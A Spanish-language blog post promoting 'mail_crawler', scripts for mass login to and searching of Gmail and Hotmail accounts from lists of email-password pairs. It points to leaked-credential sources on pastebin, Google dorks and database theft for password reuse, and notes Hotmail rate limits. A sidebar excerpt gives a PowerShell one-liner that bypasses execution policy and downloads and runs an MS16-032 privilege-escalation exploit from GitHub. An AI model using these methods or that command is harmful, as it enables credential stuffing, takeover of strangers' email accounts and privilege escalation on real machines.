mail_crawler: intrusión y revisión masiva de cuentas de correo


Saludos,


Éste video se trata de como ingresar masivamente a cuentas de correo pop3 e imap haciendo uso de programación, para efectos de la prueba se usaron cuentas de hotmail y gmail, su utilidad se presenta cuando tenemos un listado grande de cuentas de correo y contraseñas las cuales necesitamos verificar, ya sea sólo verificar el ingreso para constatar que la contraseña sea válida o hacer otro tipo de operaciones como revisar el tamaño de las carpetas, buscar un mensaje, buscar palabras claves dentro de los mensajes y de coincidir con dicha palabra descargarlo, y asi mismo podemos modificar el script para que mueva, elimine o envíe correos en todas las cuentas que se encuentren en el archivo de configuración que vamos a usar.
Hay casos en los cuales investigadores informáticos haciéndole análisis de malware a un virus han podido obtener el preciado botin del bicho, todas las cuentas de correo que ha capturado con sus respectivas contraseñas en ocasiones miles, ese es uno de los casos en que el script mail_crawler podría ser útil.

También en los casos que se necesite sacar toda la información confidencial de un listado grande de correos en poco tiempo en el caso que alguien hackee dichos datos y los haga públicos, vease búsquedas como "email password leak @" en pastebin.com

Vease también @dumpmon un bot de twitter que está constantemente monitoreando varios sitios y avisando cada vez que detecta que se han publicado datos sensibles como correos y contraseñas, archivos de configuración de routers, switches, etc

# Uno de los trinos de @dumpmon

https://twitter.com/dumpmon/status/723963872269443072
# Busqueda en pastebin de correos y contraseñas

http://pastebin.com/search?q=email+password+leak+%40


# Uno de los resúltados de la búsqueda con varias cuentas de correos y sus respectivas contraseñas

http://pastebin.com/teija5qQ

 Otra forma de encontrar una gran cantidad de correos con sus contraseñas es encontrar una vunerabilidad en alguna web y sacar todos los correos y contraseñas de la base de datos, luego probar si los usuarios están usando los mismos correos y contraseñas de sus cuentas de gmail y hotmail en dicha web (donde está presente la vulnerabilidad).

Otra forma es hacer uso de google hacking, tipos de búsquedas como:

# Búsqueda en google de archivos de excel que contienen correos y contraseñas

"mail password filetype:xls"


Existen muchas otras formas para encontrar un listado grande
Algunas de las limitaciones que he encontrado en las pruebas es que los servidores de hotmail limitan el número de peticiones de conexión que se hacen desde una misma cuenta mediante un script haciendo uso del protocólo pop3 es decir no podemos usar el mismo script para loguearnos y cerrar sesión en una cuenta de hotmail más de 10 veces en un periodo de 15 minutos, dicha limitación no se presenta cuando el cliente que se conecta es microsoft outlook, cuando el servidor pop3 de hotmail detecta que quien está haciendo la petición de logueo para descarga, envío y demás operaciones de los correos es el cliente de ms outlook, no lo restringe pero cuando es un script u otro cliente de correo como thunderbird u otro, presenta problemas de límite de conexión.
La duración del vídeo es de 1hora 12 minutos, para los que no tengan tiempo de verlo completo vean los últimos 10 minutos que es allí donde se muestra la ejecución del script
El script funciona sin problema en windows y usando python 2.7.x

Para usarlo bajo linux en distribuciones recientes como Kali y otras funciona sin problema, y sin prerequisitos, solo se ejecuta.


En el caso de que la distribución sea alguna versión vieja y no funcione puede ser neceario instalar algunas librerías de python, basicamente de la siguiente manera:

apt-get install python-setuptools
easy_install pythonbrew
pythonbrew install 2.7.3
apt-get install -f
apt-get install zlib
easy_install pip
pythonbrew
pythonbrew install 2.7.3
pythonbrew switch 2.7.3
pythonbrew use 2.7.3
pip install pyopenssl


Video de la ejecución del script:




Repositorio donde se encuentra el código fuente del script:

https://github.com/kr1shn4murt1/mail_Crawler


Script gmail crawler y su archivo de configuracción:

Gmail_Crawler.py

Correos_Gmail.conf



Script de estado de carpetas de hotmail y su archivo de configuración:

Estado_Carpetas_Hotmail.py

Correos_Hotmail.conf





 

Comentarios

Publicar un comentario

Entradas más populares de este blog

Obtener el ID y password de teamviewer de una maquina en la LAN

Imagen
La herramienta de la que hablaré en este post obtiene el id y password de teamviewer en un proceso de post explotación. Nació de la necesidad que tuve durante un pentest donde el escenario era el siguiente: Obtuve shell remota en una máquina donde podía ejecutar comandos pero no tenía acceso a entorno gráfico, la máquina no tenía activado escritorio remoto, la seguridad era fuerte, antivirus instalado y actualizado el cual no pude desactivar por linea de comandos, sistema perimetral de seguridad, reglas de filtrado de tráfico en el utm el cual no sabía que tanto estaba siendo monitoreado. La shell la obtuve sin ejecutar ningún exploit, la idea era no ejecutar nada sospechoso que pudiera disparar alarmas en el antivirus instalado localmente ni en el sistema de seguridad perimetral ya que el pentest se daría por terminado si algún comportamiento malicioso era detectado La máquina tenía instalado teamviewer, si lograba de alguna manera leer desde línea de comandos el id y contr
Leer más

Activar mensajero en Windows 7 y 2008

Imagen
Saludos, El mensajero es un servicio que permite enviar mensajes entre dos equipos con sistema operativo windows, para usarlo primero se debe activar tanto en el equipo origen como en el equipo destino y luego se utiliza digitando en el prompt o en inicio - ejecutar el comando: net send [equipo de destino] [mensaje a enviar] , o en vez de equipo de destino se puede reemplazar por "*" si es a toda la red, los mensajes aparecerán en los equipos de destino como una ventana  pop up, veremos la manera de emular su funcionamiento en windows 7 y 2008 de donde fué eliminado dicho servicio. Este se activa en Windows XP y 2003 en el menú panel de control - herramientas administrativas - servicios, allí se busca el mensajero, se le da click derecho - propiedades y luego de la lista desplegable de tipo de inicio se le pone inicio automático, luego click al botón iniciar y listo, ejecutando el procedimiento en dos equipos ya se puede enviar mensajes entre ellos. Por r
Leer más

La forma mas sencilla de escalar privilegios en windows - easiest privilege escalation on windows

La forma mas sencilla de escalar privilegios en windows, copiar este comando en una ventana de cmd: powershell -ExecutionPolicy Bypass -command "IEX (New-Object Net.WebClient).DownloadString(\"https://raw.githubusercontent.com/kr1shn4murt1/PowerShell-Suite/master/Invoke-MS16-032.ps1\"); Invoke-MS16-032" @FuzzySec Escalar privilegios es basicamente pasar de ser un usuario normal en el sistema operativo para convertirse en un usuario administrador    
Leer más